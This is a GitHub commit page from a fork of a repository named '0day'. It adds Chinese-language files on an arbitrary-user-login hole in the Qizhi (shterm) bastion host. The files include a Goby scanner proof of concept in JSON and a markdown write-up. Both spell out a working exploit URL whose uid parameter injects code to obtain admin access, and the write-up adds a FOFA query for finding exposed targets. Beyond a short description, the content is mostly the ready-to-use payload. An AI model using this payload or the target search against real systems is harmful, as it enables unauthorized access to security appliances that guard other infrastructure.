forked from msr00t/0day
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
6 changed files
with
95 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| # 齐治堡垒机 | ||
|
|
||
| #### 齐治堡垒机 任意用户登录漏洞 |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
55 changes: 55 additions & 0 deletions
55
11-齐治堡垒机/齐治堡垒机 任意用户登录漏洞/shtermQiZhi_Fortress_Arbitrary_User_Login.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,55 @@ | ||
| { | ||
| "Name": "shterm(QiZhi) Fortress Arbitrary User Login", | ||
| "Level": "3", | ||
| "Tags": [ | ||
| "Any user login" | ||
| ], | ||
| "GobyQuery": "app=\"shterm-Fortres-Machine\"", | ||
| "Description": "Qizhi fortress machine has any user login vulnerability, access to a specific URL can obtain background permissions", | ||
| "Product": "shterm(QiZhi) Fortress ", | ||
| "Homepage": "shterm.com", | ||
| "Author": "PeiQi", | ||
| "Impact": "<p>Get background permission<br></p>", | ||
| "Recommandation": "", | ||
| "References": [ | ||
| "http://wiki.peiqi.tech" | ||
| ], | ||
| "ScanSteps": [ | ||
| "AND", | ||
| { | ||
| "Request": { | ||
| "method": "GET", | ||
| "uri": "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm", | ||
| "follow_redirect": false, | ||
| "header": { | ||
| "Cookie": "PHPSESSID=4uh4l0e3b0fd28d27l71u5be36" | ||
| }, | ||
| "data_type": "text", | ||
| "data": "" | ||
| }, | ||
| "ResponseTest": { | ||
| "type": "group", | ||
| "operation": "AND", | ||
| "checks": [ | ||
| { | ||
| "type": "item", | ||
| "variable": "$code", | ||
| "operation": "==", | ||
| "value": "200", | ||
| "bz": "" | ||
| }, | ||
| { | ||
| "type": "item", | ||
| "variable": "$body", | ||
| "operation": "contains", | ||
| "value": "错误的id", | ||
| "bz": "" | ||
| } | ||
| ] | ||
| }, | ||
| "SetVariable": [] | ||
| } | ||
| ], | ||
| "PostTime": "2021-04-09 23:53:26", | ||
| "GobyVersion": "1.8.255" | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| # 齐治堡垒机 任意用户登录漏洞 | ||
|
|
||
| ## 漏洞描述 | ||
|
|
||
| 齐治堡垒机 存在任意用户登录漏洞,访问特定的Url即可获得后台权限 | ||
|
|
||
| ## 漏洞影响 | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 齐治堡垒机 | ||
| ## FOFA | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > app="齐治科技-堡垒机" | ||
| ## 漏洞复现 | ||
|
|
||
| 漏洞POC为 | ||
|
|
||
| ``` | ||
| http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm | ||
| ``` | ||
|
|
||
|  | ||
|
|
||
| ## Goby & POC | ||
|
|
||
| > [!NOTE] | ||
| > | ||
| > 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中 | ||
| > | ||
| > shterm(QiZhi) Fortress Arbitrary User Login | ||
|  |